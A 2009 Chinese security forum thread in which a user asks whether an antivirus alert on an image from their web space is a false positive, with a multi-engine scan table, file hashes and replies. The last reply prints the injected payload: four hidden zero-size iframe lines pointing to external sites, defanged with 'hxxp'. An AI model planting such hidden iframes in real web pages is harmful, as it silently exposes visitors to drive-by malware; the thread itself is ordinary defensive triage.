空间里的一个东东

显示全部楼层 · 发表于 2009-4-8 21:26:21

文件 zhongyi_20070627001_1_.rar 接收于 2009.04.08 15:20:51 (CET)

反病毒引擎	版本	最后更新	扫描结果
a-squared	4.0.0.101	2009.04.08	-
AhnLab-V3	5.0.0.2	2009.04.08	-
AntiVir	7.9.0.138	2009.04.08	HTML/PicFrame.Gen
Antiy-AVL	2.0.3.1	2009.04.08	-
Authentium	5.1.2.4	2009.04.08	HTML/IFrame
Avast	4.8.1335.0	2009.04.07	HTML:Iframe-gen
AVG	8.5.0.285	2009.04.08	-
BitDefender	7.2	2009.04.08	-
CAT-QuickHeal	10.00	2009.04.08	-
ClamAV	0.94.1	2009.04.08	-
Comodo	1105	2009.04.08	-
DrWeb	4.44.0.09170	2009.04.08	-
eSafe	7.0.17.0	2009.04.07	-
eTrust-Vet	31.6.6444	2009.04.08	-
F-Prot	4.4.4.56	2009.04.08	HTML/IFrame
F-Secure	8.0.14470.0	2009.04.08	-
Fortinet	3.117.0.0	2009.04.08	-
GData	19	2009.04.08	HTML:Iframe-gen
Ikarus	T3.1.1.49.0	2009.04.08	-
K7AntiVirus	7.10.695	2009.04.07	-
Kaspersky	7.0.0.125	2009.04.08	-
McAfee	5577	2009.04.07	Suspicious IFrame.d
McAfee+Artemis	5577	2009.04.07	Suspicious IFrame.d
McAfee-GW-Edition	6.7.6	2009.04.08	Script.PicFrame.Gen
Microsoft	1.4502	2009.04.08	-
NOD32	3994	2009.04.07	-
Norman	6.00.06	2009.04.08	-
nProtect	2009.1.8.0	2009.04.08	-
Panda	10.0.0.14	2009.04.07	-
PCTools	4.4.2.0	2009.04.08	-
Prevx1	V2	2009.04.08	-
Rising	21.24.22.00	2009.04.08	-
Sophos	4.40.0	2009.04.08	-
Sunbelt	3.2.1858.2	2009.04.08	-
Symantec	1.4.4.12	2009.04.08	-
TheHacker	6.3.4.0.303	2009.04.08	-
TrendMicro	8.700.0.1004	2009.04.08	HTML_IFRAME.AZ
VBA32	3.12.10.2	2009.04.08	-
ViRobot	2009.4.7.1684	2009.04.08	-
VirusBuster	4.6.5.0	2009.04.07	-

附加信息
File size: 4478 bytes
MD5...: 8d3bb57b2197096e9d10f460ff613861
SHA1..: 9e97f51e8a9c0dece19ae0f0568c5b9f58776825
SHA256: 1896b24bfa487f05f2f78479ce1125346a0677df981b3611c8e63cd811770f23
SHA512: 4824bf00e6445c95524a49bac6dcf6e70392a4d30f70f8f31f8e74f0cfb0891d<BR>e5ca852b891f07b4c34d58e3c2659be3a35078c582b1bcec7c686d71ae03bec8
ssdeep: 96:dA7BP0tuHXpNWCGXiO8jjjcfS6btijREmnPQs:da0t+psNXiO8j9bbnD<BR>
PEiD..: -
TrID..: File type identification<BR>RAR Archive (83.3%)<BR>REALbasic Project (16.6%)
PEInfo: -
RDS...: NSRL Reference Data Set<BR>-
packers (Authentium): appended
packers (F-Prot): appended

今天刚刚安装了红伞打开空间就报毒了

一个图片而已帮忙分析下估计是误报了

显示全部楼层 · 发表于 2009-4-8 21:30:58

zhongyi_20070627001[1].jpg -------- 未知

显示全部楼层 · 发表于 2009-4-8 22:02:29

Warning

--------------------------------------------------------------------------------

In order not to compromise your security, this page will not be accessed

A virus or unwanted program has been detected
in the HTTP data on the requested page.

--------------------------------------------------------------------------------

Requested URL: http://bbs.kafan.cn/attachment.p ... cf&t=1239199297
Information Contains recognition pattern of the HTML/PicFrame.Gen HTML script virus

--------------------------------------------------------------------------------

Generated by AntiVir WebGuard 9.0.3.0, AVE 8.2.0.138, VDF 7.1.3.27
写得很清楚

显示全部楼层 · 发表于 2009-4-8 22:17:13

可能是误报。。只是图片而已发现没异常

显示全部楼层 · 发表于 2009-4-9 06:52:08

D:\kafan\zhongyi_20070627001[1].rar/zhongyi_20070627001[1].jpg 已检测: HTML.PicFrame!IK

显示全部楼层 · 发表于 2009-4-9 07:12:22

图片被修改最后被添加网站
<iframe src="hxxp://www.zzpw.org/defaul.htm" width=0 height=0></iframe>
<iframe src="hxxp://www.car122.com/defaul.htm" width=0 height=0></iframe>
<iframe src="hxxp://hldrc.com/defaul.htm" width=0 height=0></iframe>
<iframe src="hxxp://www.szsic.com.cn/defaul.htm" width=0 height=0></iframe>

[可疑文件] 空间里的一个东东

本帖子中包含更多资源